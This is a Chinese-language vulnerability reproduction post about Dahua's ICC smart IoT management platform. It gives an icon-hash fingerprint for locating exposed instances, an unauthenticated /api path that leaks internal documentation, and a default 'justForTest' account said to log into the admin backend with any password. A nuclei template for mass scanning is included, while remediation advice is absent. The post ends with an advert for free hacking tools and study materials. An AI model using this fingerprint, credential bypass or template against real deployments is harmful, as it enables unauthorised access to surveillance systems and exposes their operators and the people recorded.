【漏洞复现】某大厂存在信息泄露与逻辑漏洞

0x01 漏洞介绍
浙江大华技术股份有限公司智能物联综合管理平台是一款基于物联网技术的综合性管理平台,旨在为企业和用户提供智能化、便捷化的物联网解决方案。该平台整合了大华技术在视频监控、数据采集、数据分析等方面的核心技术,实现了对各类物联网设备的统一管理和控制,提高了企业的运营效率和管理水平。该漏洞因为对敏感目录没有做访问限制,以及没有删除默认用户。
0x02 影响版本

浙江大华技术股份有限公司智能物联综合管理平台(ICC)

0x03 语法特征

icon_hash="-1935899595"

0x04 漏洞复现
页面
 


POC

url+/api

【漏洞复现】某大厂存在信息泄露与逻辑漏洞_第1张图片


默认用户即可登录后台(密码随意)
justForTest/xxxxx
 

【漏洞复现】某大厂存在信息泄露与逻辑漏洞_第2张图片


nuclei:

id: ICC-API-INFO-WEAK
info:
  name: ICC-API-INFO-WEAK
  author: ICC-API-INFO-WEAK
  severity: medium
  tags: icon_hash="-1935899595"

http:
  - raw:
    - |
        GET /api/ HTTP/2
        Host: {{Hostname}}
        Cookie: name=value

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "文档目录"
      - type: status
        status:
          - 200

【漏洞复现】某大厂存在信息泄露与逻辑漏洞_第3张图片

 


免费领取安全学习资料包!(私聊进群一起学习,共同进步)【漏洞复现】某大厂存在信息泄露与逻辑漏洞_第4张图片

渗透工具

【漏洞复现】某大厂存在信息泄露与逻辑漏洞_第5张图片

技术文档、书籍

【漏洞复现】某大厂存在信息泄露与逻辑漏洞_第6张图片 【漏洞复现】某大厂存在信息泄露与逻辑漏洞_第7张图片

【漏洞复现】某大厂存在信息泄露与逻辑漏洞_第8张图片

面试题

帮助你在面试中脱颖而出

【漏洞复现】某大厂存在信息泄露与逻辑漏洞_第9张图片

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

【漏洞复现】某大厂存在信息泄露与逻辑漏洞_第10张图片 

【漏洞复现】某大厂存在信息泄露与逻辑漏洞_第11张图片

应急响应笔记

【漏洞复现】某大厂存在信息泄露与逻辑漏洞_第12张图片

学习路线

你可能感兴趣的:(漏洞复现,web安全,安全,网络,sql)